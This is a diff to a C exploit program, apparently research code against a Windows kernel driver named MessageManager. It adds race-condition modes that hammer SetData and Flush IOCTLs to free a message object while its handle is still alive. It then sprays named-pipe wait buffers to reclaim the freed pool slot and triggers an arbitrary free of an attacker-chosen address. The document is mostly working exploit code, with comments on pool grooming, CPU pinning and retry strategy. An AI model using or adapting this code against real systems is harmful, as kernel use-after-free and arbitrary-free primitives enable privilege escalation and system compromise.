+    /* The setter's SetData buffer is heap-allocated so it can be made large (its size is the
+     * driver's memcpy length): the larger it is, the longer SetData holds the per-message
+     * FAST_MUTEX with the message still linked on the small list, widening the window in which a
+     * concurrent Flush can grab it. This is the pure-user-mode stand-in for verifier's slow
+     * special-pool free/alloc, which is what let the same race win under verifier. */
+    SIZE_T setter_len = ctx->SetterLen ? ctx->SetterLen : 0x400;
+    UCHAR *large = NULL;
+    if (!ctx->FlushOnly) {
+        large = malloc(setter_len);
+        if (!large) { CloseHandle(dev); return 1; }
+        memset(large, 0x4c, setter_len);
+    }
     WaitForSingleObject(ctx->StartEvent, INFINITE);
-    UCHAR large[0x400];
-    memset(large, 0x4c, sizeof(large));
     for (LONG round = 1; round <= ctx->IdCount; round++) {
         while (InterlockedCompareExchange(ctx->Round, 0, 0) < round &&
                !InterlockedCompareExchange(ctx->Stop, 0, 0))
@@ -879,8 +890,15 @@ static DWORD WINAPI race_thread(void *opaque) {
             LONG spins = InterlockedCompareExchange(ctx->DelaySpins, 0, 0);
             for (LONG i = 0; i < spins; i++) YieldProcessor();
             SetEvent(ctx->PreemptEvent);
-            mm_flush(dev, 0);
-            InterlockedIncrement64(&ctx->Operations);
+            /* Hammer Flush(small) across the whole (now wide) window the setter holds the mutex,
+             * rather than one shot per round: many list walks overlap the setter's cross-list
+             * unlink, so a walk is far more likely to coincide with the moment the small-list
+             * links are torn. Stop as soon as the setter reports this round done. */
+            do {
+                mm_flush(dev, 0);
+                InterlockedIncrement64(&ctx->Operations);
+            } while (InterlockedCompareExchange(ctx->SetterDone, 0, 0) < round &&
+                     !InterlockedCompareExchange(ctx->Stop, 0, 0));
             InterlockedExchange(ctx->FlushDone, round);
         } else {
             ULONG id = (ULONG)InterlockedCompareExchange(ctx->CurrentId, 0, 0);
@@ -888,11 +906,12 @@ static DWORD WINAPI race_thread(void *opaque) {
              * delay so repeated rounds enter Flush at different points in SetData. */
             if (ctx->ShootdownPage) (void)*ctx->ShootdownPage;
             InterlockedExchange(ctx->SetterArmed, round);
-            mm_setdata(dev, id, large, sizeof(large));
+            mm_setdata(dev, id, large, setter_len);
             InterlockedIncrement64(&ctx->Operations);
             InterlockedExchange(ctx->SetterDone, round);
         }
     }
+    free(large);
     CloseHandle(dev);
     return 0;
 }
@@ -1020,12 +1039,21 @@ static int do_rip(int argc, char **argv, int arbfire) {
     int spray_count = argc > 3 ? atoi(argv[3]) : 256;
     int delay_base = argc > 4 ? atoi(argv[4]) : 0;
     int groom_count = argc > 5 ? atoi(argv[5]) : 256;
+    /* Setter SetData length == the driver's memcpy length. It must stay in (0x200, 0x2FF4]: the
+     * driver rejects Length > 0x2FF4 outright (SetData disasm), so a larger value silently no-ops
+     * the race. Widening the memcpy turned out to be the wrong lever anyway (it precedes the
+     * cross-move decision point), so default to the original 0x400. */
+    int setter_len = argc > 6 ? (int)strtol(argv[6], NULL, 0) : 0x400;
     if (message_count < 1 || spray_count < 64) {
         printf("[rip] require messages>=1, retained-tfub-sprays>=64\n");
         return 2;
     }
     if (delay_base < 0 || groom_count < message_count) {
         printf("[rip] require flush-delay-spins>=0 and groom-events>=messages\n");
+        return 2;
+    }
+    if (setter_len <= 0x200 || setter_len > 0x2FF4) {
+        printf("[rip] require setter-bytes in (0x200, 0x2FF4] (driver rejects Length > 0x2FF4)\n");
         return 2;
     }
 
@@ -1217,6 +1245,7 @@ static int do_rip(int argc, char **argv, int arbfire) {
         race[i].FlushDone = &flush_done;
         race[i].DelaySpins = &delay_spins;
         race[i].PreemptEvent = preempt_event;
+        race[i].SetterLen = (SIZE_T)setter_len;
         threads[i] = CreateThread(NULL, 0, race_thread, &race[i], 0, NULL);
         if (!threads[i]) break;
         started++;
@@ -1284,8 +1313,9 @@ static int do_rip(int argc, char **argv, int arbfire) {
      * CPU 1, forcing a targeted reschedule while Flush runs on CPU 0. Every message therefore gets
      * an independently aligned race window. */
     printf("[rip] racing on CPUs flush=0/setter=1, TLB storm=2, reschedule storm=1; "
-           "CPU 3 reserved for CREATE trigger; flush delays %d..%d spins\n",
-           delay_base, delay_base + ((seeded - 1) % 512) * 16);
+           "CPU 3 reserved for CREATE trigger; flush delays %d..%d spins; setter memcpy 0x%x "
+           "bytes; flush hammers Flush(small) across each round\n",
+           delay_base, delay_base + ((seeded - 1) % 512) * 16, (unsigned)setter_len);
     SetEvent(start_event);
     int completed_rounds = 0;
     ULONGLONG race_deadline = GetTickCount64() + 30000;
@@ -1847,7 +1877,402 @@ static int do_reclaimprobe(int argc, char **argv) {
     return ok ? 0 : 1;
 }
 
+/* ---- High-volume SetData/Flush drift race ---------------------------------------- */
+/*
+ * The arb-free needs a MESSAGE freed to refcount 0 while its handle node is still alive. The only
+ * path to that (reversed live, see the SetData/Flush disasm) is the cross-move missing-inc:
+ * SetData reads the Linked flag stale (==1) while a concurrent Flush on the source list clears it
+ * and decrements, so SetData relinks to the target list WITHOUT the compensating inc -- the message
+ * ends on a list at refcount one-too-low, and the next Flush on that list frees it with the node
+ * alive. The window is a few instructions, so the win is statistical; the only lever is VOLUME.
+ *
+ * Every earlier harness did one cross-move per message (~32-192 attempts/run). This mode instead
+ * loops cross-moves (SetData large<->small) on a small set of messages while a Flush(small) worker
+ * and a Flush(large) worker hammer both lists, for `seconds` -- millions of attempts. A win frees a
+ * live-node message; the setter's next SetData on that id, or a Flush walking the torn list, then
+ * touches freed/reused pool and the guest bugchecks *from MessageManager* -- the winnability proof.
+ * Run it detached with KD out of band to catch the bugcheck; recover with .reboot. This is the
+ * gate: if it never bugchecks, no volume of the user-mode race wins and the free stays KD-assisted.
+ */
+typedef struct _DRIFT_CTX {
+    volatile LONG *Stop;
+    ULONG *Ids;
+    int Count;
+    int Role;               /* 0 = setter (cross-move both ways), 1 = Flush(small), 2 = Flush(large),
+                             * 3 = setter, large-only (small->large cross-move only),
+                             * 5 = continuous arb-IoSB reclaim (fill freed 0x80 slots with 0x4242) */
+    int MaxPasses;          /* setter roles: stop after this many passes (0 = until Stop) */
+    HANDLE StartEvent;
+    volatile LONG64 Ops;
+    /* role 5 shares one growing pool across reclaimers via an atomic cursor. */
+    PENDING_PIPEWAIT *Pool;
+    volatile LONG *PoolNext;
+    int PoolCap;
+} DRIFT_CTX;
+
+static DWORD WINAPI drift_thread(void *opaque) {
+    DRIFT_CTX *c = opaque;
+    HANDLE dev = open_device();
+    if (!dev) return 1;
+    SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
+    UCHAR large[0x400], small[0x40];    /* both within [0x20,0x2FF4]; 0x400>=0x200 -> large list */
+    memset(large, 0x4c, sizeof(large));
+    memset(small, 0x41, sizeof(small));
+    WaitForSingleObject(c->StartEvent, INFINITE);
+    LONG64 ops = 0;
+    int passes = 0;
+    while (!InterlockedCompareExchange(c->Stop, 0, 0)) {
+        if (c->Role == 0) {
+            for (int i = 0; i < c->Count; i++) {
+                mm_setdata(dev, c->Ids[i], large, sizeof(large));   /* small -> large cross-move */
+                mm_setdata(dev, c->Ids[i], small, sizeof(small));   /* large -> small cross-move */
+                ops += 2;
+            }
+        } else if (c->Role == 3) {
+            /* Large-only, single-direction: each message is touched exactly once per pass, so a
+             * freed message is never re-touched (no uncontrolled SetData-on-freed crash). The
+             * small->large cross-move races Flush(small) for the missing-inc, priming M onto the
+             * large list; with no Flush(large) running, a primed M is never freed here. */
+            for (int i = 0; i < c->Count; i++) {
+                mm_setdata(dev, c->Ids[i], large, sizeof(large));
+                ops++;
+            }
+        } else if (c->Role == 1) {
+            mm_flush(dev, 0);
+            ops++;
+        } else if (c->Role == 2) {
+            mm_flush(dev, 1);
+            ops++;
+        } else {   /* Role 5: continuous arb-IoSB reclaim. Each pending FSCTL_PIPE_WAIT drops a
+                    * generic-context 0x68 NonPagedNx SystemBuffer (Buffer +0x18 == 0x4242..,
+                    * RefCount +0x00 == 1) into the 0x80 free list -- so a slot a race-freed MESSAGE
+                    * just vacated is refilled as a ready-to-arb-free fake MESSAGE. When a setter
+                    * re-touches (SetData) or the driver Deletes that node, ExFreePoolWithTag(0x4242)
+                    * fires: the clean, attacker-chosen arbitrary free. */
+            LONG idx = InterlockedIncrement(c->PoolNext) - 1;
+            if (idx >= c->PoolCap) { for (LONG i = 0; i < 200000 && !InterlockedCompareExchange(c->Stop,0,0); i++) YieldProcessor(); continue; }
+            spray_pending_pipewait(idx, &c->Pool[idx], 0, 1);
+            ops++;
+        }
+        if ((c->Role == 0 || c->Role == 3) && c->MaxPasses > 0 && ++passes >= c->MaxPasses)
+            break;
+    }
+    c->Ops = ops;
+    CloseHandle(dev);
+    return 0;
+}
+
+static int do_drift(int argc, char **argv) {
+    int count = argc > 2 ? atoi(argv[2]) : 64;
+    int seconds = argc > 3 ? atoi(argv[3]) : 20;
+    int setters = argc > 4 ? atoi(argv[4]) : 1;
+    if (count < 1 || seconds < 1 || setters < 1 || setters > 2) {
+        printf("[drift] require count>=1, seconds>=1, setters in 1..2\n");
+        return 2;
+    }
+    WORD group = 0;
+    if (!validate_rip_cpu_layout(&group)) return 2;
+
+    HANDLE dev = open_device();
+    if (!dev) {
+        printf("[drift] open \\\\.\\MessageDevice failed: %lu\n", GetLastError());
+        return 1;
+    }
+    mm_flush(dev, 0);
+    mm_flush(dev, 1);                    /* start from empty small/large lists */
+
+    ULONG *ids = calloc((size_t)count, sizeof(ULONG));
+    if (!ids) { CloseHandle(dev); return 2; }
+    int made = 0;
+    for (; made < count; made++)
+        if (!mm_create(dev, &ids[made])) break;
+    if (made < 1) { printf("[drift] Create failed: %lu\n", GetLastError()); CloseHandle(dev); return 1; }
+    UCHAR seed[0x40];
+    memset(seed, 0x53, sizeof(seed));
+    for (int i = 0; i < made; i++)
+        mm_setdata(dev, ids[i], seed, sizeof(seed));    /* seed each onto the small list (RC=2) */
+    printf("[drift] pid=%lu created+seeded %d messages onto the small list; ids %lu..%lu\n",
+           GetCurrentProcessId(), made, ids[0], ids[made - 1]);
+
+    /* Threads: `setters` setter(s) cross-moving, one Flush(small), one Flush(large). */
+    int nthreads = setters + 2;
+    DRIFT_CTX *ctx = calloc((size_t)nthreads, sizeof(*ctx));
+    HANDLE *threads = calloc((size_t)nthreads, sizeof(*threads));
+    if (!ctx || !threads) { free(ids); CloseHandle(dev); return 2; }
+    volatile LONG stop = 0;
+    HANDLE start = CreateEventW(NULL, TRUE, FALSE, NULL);
+    if (!start) { free(ctx); free(threads); free(ids); CloseHandle(dev); return 2; }
+
+    const DWORD_PTR masks[] = { MM_CPU_SETTER_MASK, MM_CPU_TRIGGER_MASK };  /* setters: CPU1, CPU3 */
+    int started = 0;
+    for (int i = 0; i < nthreads; i++) {
+        ctx[i].Stop = &stop;
+        ctx[i].Ids = ids;
+        ctx[i].Count = made;
+        ctx[i].StartEvent = start;
+        ctx[i].Ops = 0;
+        DWORD_PTR mask;
+        if (i < setters) { ctx[i].Role = 0; mask = masks[i % 2]; }
+        else if (i == setters) { ctx[i].Role = 1; mask = MM_CPU_FLUSH_MASK; }   /* Flush(small) CPU0 */
+        else { ctx[i].Role = 2; mask = MM_CPU_TLB_MASK; }                        /* Flush(large) CPU2 */
+        threads[i] = CreateThread(NULL, 0, drift_thread, &ctx[i], 0, NULL);
+        if (!threads[i]) break;
+        started++;
+        if (!pin_thread(threads[i], mask, "drift worker")) break;
+    }
+    if (started != nthreads) {
+        printf("[drift] prepared only %d/%d threads\n", started, nthreads);
+        InterlockedExchange(&stop, 1);
+        SetEvent(start);
+        for (int i = 0; i < started; i++) { WaitForSingleObject(threads[i], 15000); CloseHandle(threads[i]); }
+        CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
+        return 1;
+    }
+    printf("[drift] racing %d setter(s) + Flush(small)@CPU0 + Flush(large)@CPU2 for %d s -- "
+           "a bugcheck from MessageManager means the missing-inc race won\n", setters, seconds);
+    fflush(stdout);
+    SetEvent(start);
+    Sleep((DWORD)seconds * 1000);
+    InterlockedExchange(&stop, 1);
+    WaitForMultipleObjects(nthreads, threads, TRUE, 30000);
+    LONG64 total = 0;
+    for (int i = 0; i < nthreads; i++) { total += ctx[i].Ops; CloseHandle(threads[i]); }
+    printf("[drift] survived %d s, %lld driver calls -- no win this run; re-run or raise volume\n",
+           seconds, (long long)total);
+    CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
+    return 0;
+}
+
+/* ---- driftfire: the controlled debugger-free arbitrary-free -----------------------
+ *
+ * `drift` proves the high-volume race frees a MESSAGE with its node alive (bugcheck 0x13A from
+ * MessageManager's own ExFreePoolWithTag in SetData). This mode converts one such win into the
+ * *clean* arbitrary-free: race a short burst to prime/free messages, STOP the setter so it cannot
+ * re-touch a freed id (the uncontrolled 0x13A), flush the primed ones so they are freed-with-node,
+ * reclaim the freed 0x68 slots with arb IoSB buffers (RefCount=1 at +0x00, Buffer=0x4242.. at +0x18),
+ * then Delete every id. A stale+reclaimed node makes Delete call ExFreePoolWithTag(0x4242424242424242,
+ * 'Tfub') -- the arbitrary free of an attacker-chosen address, fired from the driver with NO debugger
+ * and NO verifier. The proof is a bugcheck whose freed pointer is 0x4242424242424242 and whose caller
+ * is MessageManager's Delete. Bugcheck risk is the point; run detached, recover with .reboot. The
+ * race burst can still self-crash uncontrolled (a freed id re-touched before the setter stops), so it
+ * is multi-shot: re-run until the clean 0x4242 fire lands.
+ */
+static int do_driftfire(int argc, char **argv) {
+    int count = argc > 2 ? atoi(argv[2]) : 256;
+    int passes = argc > 3 ? atoi(argv[3]) : 1;
+    int spray = argc > 4 ? atoi(argv[4]) : 300;
+    int setters = argc > 5 ? atoi(argv[5]) : 1;
+    int hold = argc > 6 ? atoi(argv[6]) : 0;   /* diag: hold after the race so KD can walk primed msgs */
+    if (count < 1 || passes < 1 || spray < 1 || setters < 1 || setters > 2 || hold < 0) {
+        printf("[driftfire] require count>=1, passes>=1, spray>=1, setters in 1..2, hold>=0\n");
+        return 2;
+    }
+    WORD group = 0;
+    if (!validate_rip_cpu_layout(&group)) return 2;
+
+    HANDLE dev = open_device();
+    if (!dev) { printf("[driftfire] open device failed: %lu\n", GetLastError()); return 1; }
+    mm_flush(dev, 0);
+    mm_flush(dev, 1);
+
+    ULONG *ids = calloc((size_t)count, sizeof(ULONG));
+    if (!ids) { CloseHandle(dev); return 2; }
+    int made = 0;
+    for (; made < count; made++)
+        if (!mm_create(dev, &ids[made])) break;
+    if (made < 1) { printf("[driftfire] Create failed: %lu\n", GetLastError()); CloseHandle(dev); return 1; }
+    UCHAR seed[0x40];
+    memset(seed, 0x53, sizeof(seed));
+    for (int i = 0; i < made; i++)
+        mm_setdata(dev, ids[i], seed, sizeof(seed));       /* each onto the small list, RC=2 */
+    printf("[driftfire] pid=%lu created+seeded %d messages on small; ids %lu..%lu; %d large-only pass(es)\n",
+           GetCurrentProcessId(), made, ids[0], ids[made - 1], passes);
+    fflush(stdout);
+
+    /* Safe race: `setters` large-only setters (role 3, bounded passes) race one Flush(small).
+     * The small->large cross-move missing-inc primes messages onto the large list; nothing runs
+     * Flush(large), so no message is freed during the race and no freed id is ever re-touched --
+     * the setters self-terminate after their passes without an uncontrolled crash. */
+    int nthreads = setters + 1;
+    DRIFT_CTX *ctx = calloc((size_t)nthreads, sizeof(*ctx));
+    HANDLE *threads = calloc((size_t)nthreads, sizeof(*threads));
+    if (!ctx || !threads) { free(ids); CloseHandle(dev); return 2; }
+    volatile LONG stop = 0;
+    HANDLE start = CreateEventW(NULL, TRUE, FALSE, NULL);
+    if (!start) { free(ctx); free(threads); free(ids); CloseHandle(dev); return 2; }
+    const DWORD_PTR masks[] = { MM_CPU_SETTER_MASK, MM_CPU_TRIGGER_MASK };
+    int started = 0;
+    for (int i = 0; i < nthreads; i++) {
+        ctx[i].Stop = &stop; ctx[i].Ids = ids; ctx[i].Count = made; ctx[i].StartEvent = start;
+        DWORD_PTR mask;
+        if (i < setters) { ctx[i].Role = 3; ctx[i].MaxPasses = passes; mask = masks[i % 2]; }
+        else { ctx[i].Role = 1; mask = MM_CPU_FLUSH_MASK; }   /* Flush(small) only */
+        threads[i] = CreateThread(NULL, 0, drift_thread, &ctx[i], 0, NULL);
+        if (!threads[i]) break;
+        started++;
+        if (!pin_thread(threads[i], mask, "driftfire worker")) break;
+    }
+    if (started != nthreads) {
+        printf("[driftfire] prepared only %d/%d threads\n", started, nthreads);
+        InterlockedExchange(&stop, 1); SetEvent(start);
+        for (int i = 0; i < started; i++) { WaitForSingleObject(threads[i], 15000); CloseHandle(threads[i]); }
+        CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
+        return 1;
+    }
+    SetEvent(start);
+    /* Wait for the bounded setters to finish their passes, then stop and join the flusher. */
+    WaitForMultipleObjects(setters, threads, TRUE, 60000);
+    InterlockedExchange(&stop, 1);
+    WaitForSingleObject(threads[setters], 30000);
+    for (int i = 0; i < nthreads; i++) CloseHandle(threads[i]);
+    printf("[driftfire] race done; setters stopped -- controlled fire phase\n");
+    fflush(stdout);
+
+    if (hold > 0) {
+        printf("[driftfire] DIAG hold %d s -- walk seeded ids %lu..%lu: a primed win is RC=1 on the "
+               "large list (msg+0x08 not self-linked)\n", hold, ids[0], ids[made - 1]);
+        fflush(stdout);
+        Sleep((DWORD)hold * 1000);
+    }
+
+    /* Controlled, single-threaded: Flush(large) frees the primed (RC==1) messages -- freed with
+     * their nodes alive -- then reclaim those freed 0x68 slots with arb IoSB fake MESSAGEs. */
+    mm_flush(dev, 1);
+    mm_flush(dev, 0);
+    PENDING_PIPEWAIT *held = calloc((size_t)spray, sizeof(*held));
+    if (!held) { free(ctx); free(threads); free(ids); CloseHandle(dev); return 2; }
+    int ok = 0;
+    for (int i = 0; i < spray; i++)
+        if (spray_pending_pipewait(i, &held[i], i == 0, 1)) ok++;
+    printf("[driftfire] %d/%d arb IoSB buffers pending (Buffer=0x%016llx); Deleting %d ids to fire\n",
+           ok, spray, (unsigned long long)MM_ARB_BUFFER_SENTINEL, made);
+    fflush(stdout);
+
+    /* Fire: a stale+reclaimed node makes Delete call ExFreePoolWithTag(0x4242..,'Tfub'). */
+    for (int i = 0; i < made; i++)
+        mm_delete(dev, ids[i]);
+    printf("[driftfire] survived all Deletes -- no clean fire this run; re-run\n");
+    fflush(stdout);
+
+    for (int i = 0; i < spray; i++) release_pending_pipewait(&held[i]);
+    free(held); CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
+    return 0;
+}
+
+/* ---- driftarb: continuous winning race + continuous 0x4242 reclaim -----------------
+ *
+ * The clean, attacker-chosen arbitrary free without fighting the re-touch. The continuous `drift`
+ * race reliably frees MESSAGEs with their nodes alive (proven: it bugchecks from
+ * MessageManager!SetData's ExFreePoolWithTag within ~1 s). Its self-crash IS a re-touch --
+ * SetData(freed id) doing ExFreePoolWithTag(msg+0x18) on stale pool content. Run `reclaimers`
+ * threads that continuously drop arb IoSB fake-MESSAGE SystemBuffers (Buffer +0x18 == 0x4242..,
+ * RefCount +0x00 == 1) into the same 0x80 NonPagedNx free list the race is vacating, so a freed
+ * slot is refilled with 0x4242 BEFORE its re-touch. That re-touch (SetData) -- or a Delete on the
+ * node -- then fires ExFreePoolWithTag(0x4242424242424242) from the driver: the arbitrary free of
+ * an attacker-chosen address, debugger-free and verifier-free. Proof: a bugcheck whose freed
+ * pointer is 0x4242424242424242. Run detached; recover with .reboot. Multi-shot (some runs crash on
+ * a not-yet-reclaimed stale slot first), but each run is ~1 s, so a clean 0x4242 lands quickly.
+ */
+static int do_driftarb(int argc, char **argv) {
+    int count = argc > 2 ? atoi(argv[2]) : 128;
+    int burst_ms = argc > 3 ? atoi(argv[3]) : 40;    /* short race burst (ms), then STOP + Delete */
+    int setters = argc > 4 ? atoi(argv[4]) : 2;
+    int reclaimers = argc > 5 ? atoi(argv[5]) : 2;
+    int cap = argc > 6 ? atoi(argv[6]) : 8000;
+    if (count < 1 || burst_ms < 1 || setters < 1 || setters > 2 ||
+        reclaimers < 1 || reclaimers > 4 || cap < reclaimers + 512) {
+        printf("[driftarb] require count>=1, burst-ms>=1, setters 1..2, reclaimers 1..4, cap>=reclaimers+512\n");
+        return 2;
+    }
+    WORD group = 0;
+    if (!validate_rip_cpu_layout(&group)) return 2;
+
+    HANDLE dev = open_device();
+    if (!dev) { printf("[driftarb] open device failed: %lu\n", GetLastError()); return 1; }
+    mm_flush(dev, 0);
+    mm_flush(dev, 1);
+
+    ULONG *ids = calloc((size_t)count, sizeof(ULONG));
+    if (!ids) { CloseHandle(dev); return 2; }
+    int made = 0;
+    for (; made < count; made++)
+        if (!mm_create(dev, &ids[made])) break;
+    if (made < 1) { printf("[driftarb] Create failed: %lu\n", GetLastError()); CloseHandle(dev); return 1; }
+    UCHAR seed[0x40];
+    memset(seed, 0x53, sizeof(seed));
+    for (int i = 0; i < made; i++)
+        mm_setdata(dev, ids[i], seed, sizeof(seed));
+    printf("[driftarb] pid=%lu created+seeded %d messages; %d setter(s)+Flush(small)+Flush(large)+"
+           "%d reclaimer(s); %dms burst then Delete-trigger; clean fire frees 0x%016llx\n",
+           GetCurrentProcessId(), made, setters, reclaimers, burst_ms,
+           (unsigned long long)MM_ARB_BUFFER_SENTINEL);
+    fflush(stdout);
+
+    PENDING_PIPEWAIT *pool = calloc((size_t)cap, sizeof(*pool));
+    if (!pool) { free(ids); CloseHandle(dev); return 2; }
+    volatile LONG poolnext = 0;
+
+    int nthreads = setters + 2 + reclaimers;
+    DRIFT_CTX *ctx = calloc((size_t)nthreads, sizeof(*ctx));
+    HANDLE *threads = calloc((size_t)nthreads, sizeof(*threads));
+    if (!ctx || !threads) { free(pool); free(ids); CloseHandle(dev); return 2; }
+    volatile LONG stop = 0;
+    HANDLE start = CreateEventW(NULL, TRUE, FALSE, NULL);
+    if (!start) { free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev); return 2; }
+    const DWORD_PTR smasks[] = { MM_CPU_SETTER_MASK, MM_CPU_TRIGGER_MASK };  /* setters: CPU1, CPU3 */
+    int started = 0;
+    for (int i = 0; i < nthreads; i++) {
+        ctx[i].Stop = &stop; ctx[i].Ids = ids; ctx[i].Count = made; ctx[i].StartEvent = start;
+        ctx[i].Pool = pool; ctx[i].PoolNext = &poolnext; ctx[i].PoolCap = cap;
+        DWORD_PTR mask;
+        if (i < setters) { ctx[i].Role = 0; mask = smasks[i % 2]; }
+        else if (i == setters) { ctx[i].Role = 1; mask = MM_CPU_FLUSH_MASK; }
+        else if (i == setters + 1) { ctx[i].Role = 2; mask = MM_CPU_TLB_MASK; }
+        else { ctx[i].Role = 5; mask = ((i - setters - 2) % 2) ? MM_CPU_TLB_MASK : MM_CPU_FLUSH_MASK; }
+        threads[i] = CreateThread(NULL, 0, drift_thread, &ctx[i], 0, NULL);
+        if (!threads[i]) break;
+        started++;
+        if (!pin_thread(threads[i], mask, "driftarb worker")) break;
+    }
+    if (started != nthreads) {
+        printf("[driftarb] prepared only %d/%d threads\n", started, nthreads);
+        InterlockedExchange(&stop, 1); SetEvent(start);
+        for (int i = 0; i < started; i++) { WaitForSingleObject(threads[i], 15000); CloseHandle(threads[i]); }
+        CloseHandle(start); free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev);
+        return 1;
+    }
+    SetEvent(start);
+    Sleep((DWORD)burst_ms);
+    InterlockedExchange(&stop, 1);
+    WaitForMultipleObjects(nthreads, threads, TRUE, 60000);
+    for (int i = 0; i < nthreads; i++) CloseHandle(threads[i]);
+
+    /* The burst primed/freed some messages; the reclaimers planted 0x4242 fake MESSAGEs into freed
+     * 0x80 slots. Top that off with a synchronous batch to catch slots freed at the very end of the
+     * burst, then Delete every id under no time pressure (no setter re-touch, no torn-list Flush):
+     * a stale+reclaimed node makes Delete call ExFreePoolWithTag(0x4242..) -- the clean arb-free. */
+    LONG placed = InterlockedCompareExchange(&poolnext, 0, 0);
+    if (placed > cap) placed = cap;
+    for (LONG i = placed; i < placed + 512 && i < cap; i++)
+        spray_pending_pipewait((int)i, &pool[i], 0, 1);
+    LONG total = placed + 512 < cap ? placed + 512 : cap;
+    printf("[driftarb] burst done; %ld arb IoSB buffers planted; Deleting %d ids to fire\n",
+           total, made);
+    fflush(stdout);
+    for (int i = 0; i < made; i++)
+        mm_delete(dev, ids[i]);
+    printf("[driftarb] survived all Deletes -- no clean fire this run; re-run\n");
+    fflush(stdout);
+    for (LONG i = 0; i < total; i++) release_pending_pipewait(&pool[i]);
+    CloseHandle(start); free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev);
+    return 0;
+}
+
 int main(int argc, char **argv) {
+    /* Unbuffered stdout: when launched over WinRM the output is a redirected file, which is
+     * fully buffered by default, so an early return or a crash loses every printf. Diagnosing
+     * the race needs each line on disk as it happens. */
+    setvbuf(stdout, NULL, _IONBF, 0);
     if (!resolve_ntdll()) {
         printf("could not resolve NtQuerySystemInformation\n");
         return 2;
@@ -1860,13 +2285,19 @@ int main(int argc, char **argv) {
     if (_stricmp(mode, "trigger") == 0) return do_trigger(argc, argv);
     if (_stricmp(mode, "spray") == 0) return do_spray(argc, argv);
     if (_stricmp(mode, "reclaimprobe") == 0) return do_reclaimprobe(argc, argv);
+    if (_stricmp(mode, "drift") == 0) return do_drift(argc, argv);
+    if (_stricmp(mode, "driftfire") == 0) return do_driftfire(argc, argv);
+    if (_stricmp(mode, "driftarb") == 0) return do_driftarb(argc, argv);
     if (_stricmp(mode, "rip") == 0) return do_rip(argc, argv, 0);
     if (_stricmp(mode, "arbfire") == 0) return do_rip(argc, argv, 1);
     if (_stricmp(mode, "arbdiag") == 0) return do_rip(argc, argv, 2);
     printf("usage: %s [leak|demo|hold|fixture [duration-seconds] [messages] [stop-file]|"
            "trigger [duration-seconds]|rip [messages] [retained-tfub-sprays] "
-           "[flush-delay-spins] [groom-events]|"
-           "arbfire [messages] [arb-spray-base] [flush-delay-spins] [groom-events]|"
+           "[flush-delay-spins] [groom-events] [setter-bytes]|"
+           "arbfire [messages] [arb-spray-base] [flush-delay-spins] [groom-events] [setter-bytes]|"
+           "drift [count] [seconds] [setters]|"
+           "driftfire [count] [passes] [spray] [setters]|"
+           "driftarb [count] [burst-ms] [setters] [reclaimers] [cap]|"
            "reclaimprobe [window-seconds] [spray-count] [hold-seconds] [targets] [wait|arb|afd|pipe]|"
            "spray [pipe|pending|mailslot] [datalen] [count] [start-delay-seconds]]\n",
            argv[0]);

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -1078,6 +1078,23 @@ typedef struct _PENDING_PIPEWAIT {
 static int spray_pending_pipewait(int index, PENDING_PIPEWAIT *rec, int diag, int arb);
 static void release_pending_pipewait(PENDING_PIPEWAIT *rec);
 
+/*
+ * Gate every Delete-trigger on having actually parked an arb buffer. A spray can fail wholesale
+ * (handle exhaustion, pipe-name collision) and leave every slot empty; firing anyway produces a
+ * "survived all Deletes" line that reads as "the chain ran and the exploit missed", when what
+ * really happened is that no fake MESSAGE existed to free. That misclassification is the reason
+ * this is a shared helper rather than three copies: `arbfire`, `driftfire` and `driftarb` all end
+ * in the same trigger and must all refuse it the same way. Takes the error captured at the spray
+ * site, since printf between there and here can clobber GetLastError.
+ */
+static int arb_buffers_ready(const char *tag, int parked, int slots, DWORD spray_err) {
+    if (parked > 0) return 1;
+    printf("[%s] 0/%d arb IoSB buffers parked (last spray error %lu) -- nothing to fire; "
+           "not Deleting, re-run\n", tag, slots, spray_err);
+    fflush(stdout);
+    return 0;
+}
+
 static int do_rip(int argc, char **argv, int arbfire) {
     int message_count = argc > 2 ? atoi(argv[2]) : 192;
     int spray_count = argc > 3 ? atoi(argv[3]) : 256;
@@ -1432,6 +1449,12 @@ static int do_rip(int argc, char **argv, int arbfire) {
         int wok = 0;
         for (int i = 0; i < wcount; i++)
             if (spray_pending_pipewait(i, &wheld[i], i == 0, 1)) wok++;
+        DWORD werr = GetLastError();
+        if (!arb_buffers_ready("arbfire", wok, wcount, werr)) {
+            for (int i = 0; i < wcount; i++) release_pending_pipewait(&wheld[i]);
+            free(wheld); free(ids); CloseHandle(dev);
+            return 1;
+        }
         printf("[arbfire] %d/%d arb IoSB buffers pending; triggering Delete on %d stale ids "
                "(Buffer=0x%016llx)\n", wok, wcount, seeded,
                (unsigned long long)MM_ARB_BUFFER_SENTINEL);
@@ -2245,6 +2268,12 @@ static int do_driftfire(int argc, char **argv) {
     int ok = 0;
     for (int i = 0; i < spray; i++)
         if (spray_pending_pipewait(i, &held[i], i == 0, 1)) ok++;
+    DWORD spray_err = GetLastError();
+    if (!arb_buffers_ready("driftfire", ok, spray, spray_err)) {
+        for (int i = 0; i < spray; i++) release_pending_pipewait(&held[i]);
+        free(held); CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
+        return 1;
+    }
     printf("[driftfire] %d/%d arb IoSB buffers pending (Buffer=0x%016llx); Deleting %d ids to fire\n",
            ok, spray, (unsigned long long)MM_ARB_BUFFER_SENTINEL, made);
     fflush(stdout);
@@ -2367,17 +2396,12 @@ static int do_driftarb(int argc, char **argv) {
     LONG topoff = 0;
     for (LONG i = placed; i < placed + 512 && i < cap; i++)
         if (spray_pending_pipewait((int)i, &pool[i], 0, 1)) topoff++;
+    DWORD spray_err = GetLastError();
     LONG total = placed + 512 < cap ? placed + 512 : cap;   /* slots touched, not buffers planted */
     LONG parked = InterlockedCompareExchange(&poolok, 0, 0) + topoff;
     printf("[driftarb] burst done; %ld arb IoSB buffers planted across %ld slot(s)\n", parked, total);
     fflush(stdout);
-    /* A slot cursor is not a reclaim population: sprays fail (handle exhaustion, name collision)
-     * and leave their slot empty. With nothing parked there is no fake MESSAGE to arb-free, so a
